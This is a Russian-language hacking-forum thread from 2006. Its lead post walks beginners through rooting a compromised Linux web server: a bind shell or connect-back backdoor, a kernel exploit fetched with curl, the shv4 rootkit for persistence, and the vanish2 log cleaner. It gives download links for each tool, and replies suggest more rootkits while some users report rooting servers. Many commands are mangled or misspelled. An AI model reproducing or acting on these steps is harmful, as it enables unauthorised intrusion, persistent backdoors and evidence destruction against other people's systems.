![]() |
R00t me №1
Решил написать статейку для расширения кругозора новичков античата в целом.
Думаю, она многим понадобится и даст маленький толчок в дальнейшем развитии. Статья предназначена для тех, кто уже умеет заливать веб-шелл и ознакомлен со всеми его прелестями... Итак – мы залили шелл. Что же делать дальше? Отдаём первую команду: Код:
uname –aLinux nalog.com 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux Ядро старо,как мир.Нашей задачей будет поднять свои привилегии до максимальных aka root.Описание взлома всех версий линуксов,фрях,ect описать не реально-так что в этой статье будем говорить исключительно о Linux 2.4.20-8. Погнали) Для начала проделаем следующие шаги: 1) Код:
cd /tmpКод:
chmod +x bind.plКод:
nc sitename 32767При открытии окна командуем: id.Работает? Отлично) Но межет и не работать если фаер фильтрует соединение( Тогда скачиваем Connect-Back Backdoor (bd.c) Код:
chmod +x bd.cКод:
-l –p 4000Код:
./db 127.0.0.1Где 127.0.0.1 ваш реальный ip. И вот в окошке появилась надпись - Connected to CommandLine... Приступим к решительным действиям: Скачиваем сплойт для этой версии ядра-вполне должен подойти mremap_pte,но я советую воспользоваться xpl_brk ,т.к он меня редко подводил. Скачиваем уже cкомпилированный сплойт: Код:
curl http://xpl.netmisphere2.com/xpl_brk http://img286.imageshack.us/img286/4...62020245gg.png Надо закрепиться в системе для этого скачиваем руткит-возьмём shv4 Код:
curl http://splo1t.narod.ru/rootkits/shv4.tar.gzЗаходит в putty указываем сайт, порт и конектимся. Имя root,а пароль тот что вы указали при настройке. В моём случае это pass. Зашли? Выполняем команду: Код:
nestat -anОсталось, почистить логи. Скачиваем один из лучших клинеров под *nix -vanish2 Код:
chmod +x vanish2.Код:
gcc vanish2.c –o vanishКод:
./vanish root name_site 127.0.0.1Видим надпись: V_A_N_I_S_H_E_D_! Которая не может не радовать глаз. _ _ _ _ _ _ _ _ _ _ _ _ _ _ На этом моя статейка кончается-надеюсь она поможет новичкам... Ссылки: r57Shell: http://hcr.3dn.ru/expl/php/r57shell.txt Netcat:http://pro-hack.ru/download/s_nettools_2.html bind.pl: http://nsd.ru/soft/1/ano/bind.pl.txt Connect-Back Backdoor: http://desrow.narod.ru/www/bd.rar xpl_brk: http://desrow.narod.ru/exploits/xpl_brk.rar shv4: http://desrow.narod.ru/rootkits/shv4_.rar Putty: http://pro-hack.ru/download/s_nettools_4.html vanish2: http://nsd.ru/soft/1/anonimus/vanish2.tgz For any link pass:antichat =====[ Desr0w | | 12.04.2006 ]===== |
Молодец, хорошая статья.
|
ну так, опять ничего особенного :)
для новичков пойдёт, но надо было бы расписать значение набранных команд... + всё же поставлю... |
Как раз для новичков =) Нормуль!
|
Хорошая статья.... кста, в Nfm уже сразу сплойты есть.... скачиваются сразу скомпиленными.....
|
хмм статья конечно для новечков ничего, тока вот shv4 или 5 ставить не советую, так как он палит порт и легго пропаливается нмапом при сканировании.
советую лучше suckit http://packetstormsecurity.org/UNIX/...sk-1.3a.tar.gz тока собирается он не всегда. или adore если есть шелл доступ http://www.eviltime.com/download_id.php?id=147 или смотрим руткиты на этой паге http://www.eviltime.com/download.php...bpage=rootkits |
А почему бы не сразу СЮДА?))
|
Цитата:
Ну мне не сложно: pwd Эта команда выводит на экран полный путь к текущему каталогу. В любой момент можно узнать где вы находитесь. ls Команда ls выводит список файлов и подкаталога. По умолчанию файлы начинающиеся с точки (.) скрываются. Чтобы их увидеть надо добавить ключ -a: ls -a Для полной инфы от папках и файлах и ссылках: ls -al Хотим просмотреть файлы в других дирах: Код:
ls -al /tmpcd команда позволяет сменить текщий каталог: Код:
cd /tmp/bbbнапример в каталоге bbb есть подкаталог bb-перейдём в него. Код:
cd bbКод:
cd ..Создание директории. Например: Код:
mkdir antichatУдаление файлов. Для удаления директорий нужны след. ключи: -d -- удалить директорию. -r -- удалять содержимое директорий. -f --не спрашивать подтверждение на удаление. Код:
rm -rf /tmp/bbb/antichattar В никсах нет винрара:) Архивы поставляются в виде tar.gz Разархивируем: Код:
tar xzvf namefile.tar.gzКоманда предназначена для того,чтобы узнать каталог в котором находится программа. Мы например узнаём какая качалка стоит на серве. Пример: Код:
which ls А..И еще немного о качалках: Самая распространенная -wget есть еще: curl fetch lynx links GET зы: uname -a показывает версию системы и еще кое что. id -показывает ваши права. hostname показывает имя сайта. есть ключ -i Код:
hostname -iThe end. |
Описание руткитов:тут
|
неплохо молодец
|
Kez,приятно слышать это от тебя!
Чесно так думаешь? |
да я действительно так думаю....
|
Сори за оффпот.
Kez,отписал-что не отвечаешь. Ты бы асю еще свою дал;) |
Вот теперь всё на своих местах :) надеюсь не будет никаких глупых вопросов от нубов типа: "что такое ls, как разархивировать архив, как посмотреть открытые порты..."
Из этой статьи больше понравилась часть про руткиты, хороший обзор, много интересного, побольше бы таких статей про sql, тогда бы было ВСЁ супер! |
Скоро думаю написать про установку всего нужного софта и т.д.
Мелочь конечно,но думаю после прочтения этой статьи и просмотра видео кому то понадобится... Естественно всё будет написано в жанре для новичков:) |
Цитата:
|
Я очень много нового узнал ;) Молодец Дес ! Так держать, жду следущих материалов ...
|
Desr0w
зачем делать так: cd /tmp mkdir logs cd logs если все можна в 1ну строку через ; далее chmod +x bind.pl perl bind.pl & chmod +x bd.c gcc db.c –o bd зачем??? ты знаешь значение +x ??? почитай маны по tar & hostname а курсы у тебя наверное не очень =) ps: статья отстой! даже для новичков! не в обиду брат! |
Буду признателен,если мемберы/модеры поставят этому доброму человеку пару десятков минусов.Думаю есть за что.При -10 автобан работает?
Не понимаю я таких людей: Вот я писал-старался...Всё оценили данную статью,как хороший мануал для новичков. Но вот появляется борзый новичёк и обсирает мою статью и меня.Зачем это человеку надо? Ну может он второй Кевин Митник или кто другой,если считает что эта статья плоха даже для новичков... своими словами обламываешь так? А может он просто набиваешь посты т.к кроме критики и мата нечего больше ответить. :) гг |
угу спасиба как роаз вчера все мозги себе проебал с этой байдой.
|
точнее с этим проблем не было написанно версия такая то а сплойт не хочит запускаться пишет
[-] Unable to attach: Operation not permitted /bin/sh: line 9: 8931 Killed ./ads где ads сплойт. грят версия не падходит. |
У меня такая проблемка была часто. Запускаю bind.pl всё вроде ок. Пjтом не могу приконектиться на указанный порт. А про статью нормал. Про +x помойму это добавляються права файла на запуск.
|
Цитата:
С KEZ'ом разобрались-отличный парень:) Цитата:
Morph,рад что помог. А насчёт Код:
[-] Unable to attach: Operation not permitted |
Спасиба рута взял первого в своей жизни повесил в оправдание в своей подписи :)
Кароче спасиба делал не как ты но сплойт помог спасиба! Другие какие не пробовал все такой ошибкой и тухли =\ АГРОМНОЕ СПАСИБА! |
Цитата:
Я знаю что команды можно писть через ; ,но я уверен что для новичков будет более понятнее если команды будут написаны по очерёдно. Что зачем??Я знаб значение chmod +x - права на исполнение.Как ты запустишь бедор если нет прав на запуск,а? Маны по по tar & hostname ,а зачем? Я что написал не привильно по этим командам? Обьясни плз. *для тебя-описание команды hostname занимает две строчки.У тебя что маны по две страницы для ... Какие курсы? P.s-статья хорошая,как мануал для новичков и всё тебе это скажут. И чисто по человечески-ты мне не брат,**** super man. |
Молодец !!+
|
Молоток прям
|
тама оказываеться все путем было, спйлоты убивались а версия правильная была все мозги с некотороми проипал кто еще "дурак" оказываеться.....
|
За статю +...
|
Цитата:
Ну и ещё не понравилась манера делать back connect'ы на свой реальный ip. Для этого лучше использовать шеллы, а так статья ничего |
Цитата:
Например в видео с некого журнула чьёму сайту "Сломали нос" всегда после скачки сплойта дают права на исполнение после того как компилить... Спасибо буду знать,хоть это и мелочь. |
Хорошая статья, мне понравилась
|
Эх Kez,Kez...
Вот хотел я писать статью R00t me №2 типа установка всего необходимого софта и работа с ним... Сделав на 60-65% заметил твой обзор: http://forum.antichat.ru/thread8274.html Всё не будет стаьи кез всё разобрал( Жаль что раньше не увидел-только время на неё убил. Вот. |
народ хелп )))
я кароч поставил руткит этот воть а у меня на нем пароль какая то сцука сменила админ поидее бы нверное бы его бы убил а не пароль менял. чо то у меня такое ощущение что тама кто то кроме меня еще есть. вот такой мой первый опыт ))) |
Morph,ты shv4 ставил?
Имхо на shv4 сметить пасс нельзя... Есть два варианта: 1)ты не правильно пасс пишешь или просто приконектился случайно на стандартный порт и пытаешься зайти под настоящим админом. 2)Твой руткит удалил хакер и поставил свой ,что я сомневаюсь- т.к он бы 100 % перевесил на другой порт. Думаю причина №1 больше вероятна. Пробни еше раз зацепится на тот порт ,на который вешал и ввести пароль не торопясь(можно раскладку клавы пробить;) Удачи. |
Спасиба но все я правильно делаю все на тот же порт конечусь и пароль не правильный :(
То есть возможно что был поставлен руткит другим челом чтоли? Именно на этот порт да? И пароль сменился мой на его? А если я щас заного поставлю этот руткит и установлю его заного но на другой порт повешу? Этот руткит старый на котором пароль не подходит он не удалиться? Ну тоесть возможно ли чтобы на 1 тачке весело два одинаковых руткита? но висело на разных портах и на разных паролях? |
Тьфу блин )
Ну то есть два руткита но на разных портах и один другого не трогал? |
Кстати каким макаром руткит удалить то?
|
НУ и нафлуди ты:)
Два руткита врятли,т.к он подменяет системные файлы своими.Т.е не может быть 2 пары подменённых системных файлов,да и ядру наверно сразу бошнб снёсёт и оно упадёт. Удалить скрипт можно только возвратом системных файлов... Корочь у тебя бредовая совсем ситуация..Посмотрим что скажут другие знающие я уже всё вроде сказал... |
то есть ничего не зделать?
хмм блин =\ |
| Время: 01:20 |